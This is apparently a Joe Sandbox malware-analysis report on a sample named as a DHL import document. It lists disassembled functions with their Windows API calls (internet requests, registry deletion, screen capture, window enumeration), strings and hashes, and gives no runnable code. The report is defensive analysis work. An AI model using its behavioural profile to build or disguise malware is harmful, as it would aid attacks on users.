Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: f22e93fdaca8c40a738a82f15d05e96d9e02e79fab9f80ce76b13bfe2def2d45
Instruction ID: eb6ce28b7c7f65531e215c7a47e392d2e800d9b1127fc911d169321357c877be
Opcode Fuzzy Hash: f22e93fdaca8c40a738a82f15d05e96d9e02e79fab9f80ce76b13bfe2def2d45
Instruction Fuzzy Hash: F9514FB1500305BFDB218FA4D998AAB7FFCFF14756F00441EF94596250EB34EA48AB60

Function 0057856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00578592
GetFileSize.KERNEL32(00000000,00000000), ref: 005785A2
GlobalAlloc.KERNEL32(00000002,00000000), ref: 005785AD
CloseHandle.KERNEL32(00000000), ref: 005785BA
GlobalLock.KERNEL32(00000000), ref: 005785C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 005785D7
GlobalUnlock.KERNEL32(00000000), ref: 005785E0
CloseHandle.KERNEL32(00000000), ref: 005785E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 005785F8
OleLoadPicture.OLEAUT32(?,00000000,00000000,0057FC38,?), ref: 00578611
GlobalFree.KERNEL32(00000000), ref: 00578621
GetObjectW.GDI32(?,00000018,000000FF), ref: 00578641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00578671
DeleteObject.GDI32(00000000), ref: 00578699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 005786AF

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 066f23fef2cc3f3cde0fa72460dedff946b9c15dd96720694348ec3e451831ba
Instruction ID: 03c74175a62efa71d2b7070af35557cd496365b8e47dbf08ba8c5bc7fc3ff4fb
Opcode Fuzzy Hash: 066f23fef2cc3f3cde0fa72460dedff946b9c15dd96720694348ec3e451831ba
Instruction Fuzzy Hash: 64412975640204BFDB119FA5EC8CEAA7FB8FF99B11F108058F909E7260DB309945EB60

Function 005514BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00551502
VariantCopy.OLEAUT32(?,?), ref: 0055150B
VariantClear.OLEAUT32(?), ref: 00551517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 005515FB
VarR8FromDec.OLEAUT32(?,?), ref: 00551657
VariantInit.OLEAUT32(?), ref: 00551708
SysFreeString.OLEAUT32(?), ref: 0055178C
VariantClear.OLEAUT32(?), ref: 005517D8
VariantClear.OLEAUT32(?), ref: 005517E7
VariantInit.OLEAUT32(00000000), ref: 00551823

Strings

Default, xrefs: 005516AF
%4d%02d%02d%02d%02d%02d, xrefs: 00551625

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 3a9006ebc4261bf77b96b255c7d5c6489bef5528d4270b2a2b49817b10391b8e
Instruction ID: 8451925c2bf3022a13debee1737f35d3abf488dcb244aed8da1e260ff833275b
Opcode Fuzzy Hash: 3a9006ebc4261bf77b96b255c7d5c6489bef5528d4270b2a2b49817b10391b8e
Instruction Fuzzy Hash: 0CD1F171600905DBCB00AF66E8A5B7DBFB5BF44706F14845BF806AB180EB38EC49DB59

Function 0056B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 004E9CB3: _wcslen.LIBCMT ref: 004E9CBD

Part of subcall function 0056C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0056B6AE,?,?), ref: 0056C9B5
Part of subcall function 0056C998: _wcslen.LIBCMT ref: 0056C9F1
Part of subcall function 0056C998: _wcslen.LIBCMT ref: 0056CA68
Part of subcall function 0056C998: _wcslen.LIBCMT ref: 0056CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0056B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0056B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0056B80A
RegCloseKey.ADVAPI32(?), ref: 0056B87E
RegCloseKey.ADVAPI32(?), ref: 0056B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0056B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0056B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0056B922
FreeLibrary.KERNEL32(00000000), ref: 0056B983
RegCloseKey.ADVAPI32(00000000), ref: 0056B994

Strings

advapi32.dll, xrefs: 0056B8ED
RegDeleteKeyExW, xrefs: 0056B8FE

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 1ce63c6baa0bb4fd78c69b4a2d2e2e50f77401a7b708bcb752bcff380e7d91a1
Instruction ID: 9582510963c8f877d4f9f0ab265b98c17af35983a8f78f56621f885586c3f028
Opcode Fuzzy Hash: 1ce63c6baa0bb4fd78c69b4a2d2e2e50f77401a7b708bcb752bcff380e7d91a1
Instruction Fuzzy Hash: ECC18D30208241AFE714DF15C494F2ABBE5FF84318F14895DF59A8B2A2CB35ED86CB91

Function 0056255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 005625D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 005625E8
CreateCompatibleDC.GDI32(?), ref: 005625F4
SelectObject.GDI32(00000000,?), ref: 00562601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0056266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 005626AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 005626D0
SelectObject.GDI32(?,?), ref: 005626D8
DeleteObject.GDI32(?), ref: 005626E1
DeleteDC.GDI32(?), ref: 005626E8
ReleaseDC.USER32(00000000,?), ref: 005626F3

Strings

(, xrefs: 0056268D

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: bc826e1439d1f7d0632fdbc6a793b2721a7166597a82168ed48f99259e65195a
Instruction ID: 8ceeb0e88bea88bf99793fb664179018d297b15390fc8a30c454945721625946
Opcode Fuzzy Hash: bc826e1439d1f7d0632fdbc6a793b2721a7166597a82168ed48f99259e65195a
Instruction Fuzzy Hash: D761F4B5D00219EFCF14CFA8D884EAEBBB5FF58310F208529E95AA7250D770A945DF90

Function 0051DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0051DAA1

Part of subcall function 0051D63C: _free.LIBCMT ref: 0051D659
Part of subcall function 0051D63C: _free.LIBCMT ref: 0051D66B
Part of subcall function 0051D63C: _free.LIBCMT ref: 0051D67D
Part of subcall function 0051D63C: _free.LIBCMT ref: 0051D68F
Part of subcall function 0051D63C: _free.LIBCMT ref: 0051D6A1
Part of subcall function 0051D63C: _free.LIBCMT ref: 0051D6B3
Part of subcall function 0051D63C: _free.LIBCMT ref: 0051D6C5
Part of subcall function 0051D63C: _free.LIBCMT ref: 0051D6D7
Part of subcall function 0051D63C: _free.LIBCMT ref: 0051D6E9
Part of subcall function 0051D63C: _free.LIBCMT ref: 0051D6FB
Part of subcall function 0051D63C: _free.LIBCMT ref: 0051D70D
Part of subcall function 0051D63C: _free.LIBCMT ref: 0051D71F
Part of subcall function 0051D63C: _free.LIBCMT ref: 0051D731

_free.LIBCMT ref: 0051DA96

Part of subcall function 005129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0051D7D1,00000000,00000000,00000000,00000000,?,0051D7F8,00000000,00000007,00000000,?,0051DBF5,00000000), ref: 005129DE
Part of subcall function 005129C8: GetLastError.KERNEL32(00000000,?,0051D7D1,00000000,00000000,00000000,00000000,?,0051D7F8,00000000,00000007,00000000,?,0051DBF5,00000000,00000000), ref: 005129F0

_free.LIBCMT ref: 0051DAB8
_free.LIBCMT ref: 0051DACD
_free.LIBCMT ref: 0051DAD8
_free.LIBCMT ref: 0051DAFA
_free.LIBCMT ref: 0051DB0D
_free.LIBCMT ref: 0051DB1B
_free.LIBCMT ref: 0051DB26
_free.LIBCMT ref: 0051DB5E
_free.LIBCMT ref: 0051DB65
_free.LIBCMT ref: 0051DB82
_free.LIBCMT ref: 0051DB9A

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: b42a45c5ce74661f50d455123aecb31c65c92fcaf87625152661d228a9715f09
Instruction ID: e69c5d8ad6f1b7e22b63ab35cbe4547187e3cbfff1fabc3c56171d346abb5f65
Opcode Fuzzy Hash: b42a45c5ce74661f50d455123aecb31c65c92fcaf87625152661d228a9715f09
Instruction Fuzzy Hash: 33311B326046069FFB21AA39E849BDA7FF9FF40320F154819E449DB191DA35ACE0CB30

Function 0054365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0054369C
_wcslen.LIBCMT ref: 005436A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00543797
GetClassNameW.USER32(?,?,00000400), ref: 0054380C
GetDlgCtrlID.USER32(?), ref: 0054385D
GetWindowRect.USER32(?,?), ref: 00543882
GetParent.USER32(?), ref: 005438A0
ScreenToClient.USER32(00000000), ref: 005438A7
GetClassNameW.USER32(?,?,00000100), ref: 00543921
GetWindowTextW.USER32(?,?,00000400), ref: 0054395D

Strings

%s%u, xrefs: 00543734

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 918b8886f9da612c5c807c9bfb4fd4c919bb9a53b92e80919b2b4b3c3b62920a
Instruction ID: 11c85e6e803c54550be4c44a90973462e1c08d6aba00bd4fed0502860dc314c6
Opcode Fuzzy Hash: 918b8886f9da612c5c807c9bfb4fd4c919bb9a53b92e80919b2b4b3c3b62920a
Instruction Fuzzy Hash: 2E919471204607AFD719DF24C885FEAFBA8FF44358F104529F999D21A0DB30EA59CB91

Function 00544954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00544994
GetWindowTextW.USER32(?,?,00000400), ref: 005449DA
_wcslen.LIBCMT ref: 005449EB
CharUpperBuffW.USER32(?,00000000), ref: 005449F7
_wcsstr.LIBVCRUNTIME ref: 00544A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00544A64
GetWindowTextW.USER32(?,?,00000400), ref: 00544A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00544AE6
GetClassNameW.USER32(?,?,00000400), ref: 00544B20
GetWindowRect.USER32(?,?), ref: 00544B8B

Strings

ThumbnailClass, xrefs: 00544A6F, 00544AF1

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 2d8f03cd010430a62f6f2defced9a0e35c8373384314d79ec90301dc736cbd03
Instruction ID: fb256d7ebcade1a7004afb250085f141ed2ed50652f56e67bcad6ed74c60eeff
Opcode Fuzzy Hash: 2d8f03cd010430a62f6f2defced9a0e35c8373384314d79ec90301dc736cbd03
Instruction Fuzzy Hash: EC91AA710482069FDB04DF15C985BAA7BE9FF84318F04846AFD899A096EB34ED45CFA1

Function 0056CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0056CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0056CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0056CD48

Part of subcall function 0056CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0056CCAA
Part of subcall function 0056CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0056CCBD
Part of subcall function 0056CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0056CCCF
Part of subcall function 0056CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0056CD05
Part of subcall function 0056CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0056CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0056CCF3

Strings

advapi32.dll, xrefs: 0056CCB8
RegDeleteKeyExW, xrefs: 0056CCC9

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 507b629a3fe78355f23cc4431c8a2c03ae9890bddd89e5ac01659a6c6f9d96e1
Instruction ID: 54f654dcdfe256a568413864f97c451e7ba2571bd54dabaa2cdf496c73d21704
Opcode Fuzzy Hash: 507b629a3fe78355f23cc4431c8a2c03ae9890bddd89e5ac01659a6c6f9d96e1
Instruction Fuzzy Hash: 75315E71901129BBD7209B54DC88EFFBF7CFF56750F000169A959E7240D6349E89EAE0

Function 00553D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00553D40
_wcslen.LIBCMT ref: 00553D6D
CreateDirectoryW.KERNEL32(?,00000000), ref: 00553D9D
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00553DBE
RemoveDirectoryW.KERNEL32(?), ref: 00553DCE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00553E55
CloseHandle.KERNEL32(00000000), ref: 00553E60
CloseHandle.KERNEL32(00000000), ref: 00553E6B

Strings

\??\%s, xrefs: 00553D5B
:, xrefs: 00553D82
\, xrefs: 00553D77

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: b7b85d378dfc159202a8934602ce7cb060a1f099d3f0f20d62e4d397add69276
Instruction ID: 1b795a43273a44afdfbcd23f28d46bf52092b211f2fc334e617ebacf23b7c01e
Opcode Fuzzy Hash: b7b85d378dfc159202a8934602ce7cb060a1f099d3f0f20d62e4d397add69276
Instruction Fuzzy Hash: 603184755001196ADB219FA0DC49FEF3BBCFF85741F1044BAF909D6050E77497889B24

Function 0054E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0054E6B4

Part of subcall function 004FE551: timeGetTime.WINMM(?,?,0054E6D4), ref: 004FE555

Sleep.KERNEL32(0000000A), ref: 0054E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0054E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0054E727
SetActiveWindow.USER32 ref: 0054E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0054E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0054E773
Sleep.KERNEL32(000000FA), ref: 0054E77E
IsWindow.USER32 ref: 0054E78A
EndDialog.USER32(00000000), ref: 0054E79B

Strings

BUTTON, xrefs: 0054E719

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 0cae94e054e9b0c67fd02d5544facc10cf7d8bab3085ff043093dd6a920b39a7
Instruction ID: 58ebce8c457bb28d3523b6a417c990c0e7c824c5ef351ce35f857738b0e70e2c
Opcode Fuzzy Hash: 0cae94e054e9b0c67fd02d5544facc10cf7d8bab3085ff043093dd6a920b39a7
Instruction Fuzzy Hash: 8E216F70600245AFEB405F65FCCBA653F69F77539DF201529F50A821B1DF71AC48BA24

Function 0054E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 004E9CB3: _wcslen.LIBCMT ref: 004E9CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0054EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0054EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0054EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0054EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0054EAA7

Strings

close PlayMe, xrefs: 0054EA6E, 0054EA9B
play PlayMe, xrefs: 0054EAA2
open , xrefs: 0054EA0C
play PlayMe wait, xrefs: 0054EA91
alias PlayMe, xrefs: 0054EA36
status PlayMe mode, xrefs: 0054EA58

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: d6214671f0a46d198e6c510d01204fd36ab42b803df00ea0dda66d5c2e448670
Instruction ID: 68dd0fb5b565590b1e17d4fdf58b2fb19f93807eaec3ba244fe539e8b7c22731
Opcode Fuzzy Hash: d6214671f0a46d198e6c510d01204fd36ab42b803df00ea0dda66d5c2e448670
Instruction Fuzzy Hash: 64111C71A902697DD720A7A3DC4ADFF6EBCFBD2B49F44042AB811A20D1EAB05D45C5B0

Function 00545CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00545CE2
GetWindowRect.USER32(00000000,?), ref: 00545CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00545D59
GetDlgItem.USER32(?,00000002), ref: 00545D69
GetWindowRect.USER32(00000000,?), ref: 00545D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00545DCF
GetDlgItem.USER32(?,000003E9), ref: 00545DDD
GetWindowRect.USER32(00000000,?), ref: 00545DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00545E31
GetDlgItem.USER32(?,000003EA), ref: 00545E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00545E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00545E67

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 5a75e92598090d7e6b5c85eb0f7d909715b348111ae3205f22caa53183883cbb
Instruction ID: e1afe16ef4c10c7ce355f44d1f19ed5f575b66a195b2496c2dfebc6f0cd9d332
Opcode Fuzzy Hash: 5a75e92598090d7e6b5c85eb0f7d909715b348111ae3205f22caa53183883cbb
Instruction Fuzzy Hash: E0512D70A00605AFDB18CF68DD89AAEBBB9FF58300F14812DF51AE7291E7709E44DB50

Function 004F8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 004F8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004F8BE8,?,00000000,?,?,?,?,004F8BBA,00000000,?), ref: 004F8FC5

DestroyWindow.USER32(?), ref: 004F8C81
KillTimer.USER32(00000000,?,?,?,?,004F8BBA,00000000,?), ref: 004F8D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00536973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,004F8BBA,00000000,?), ref: 005369A1
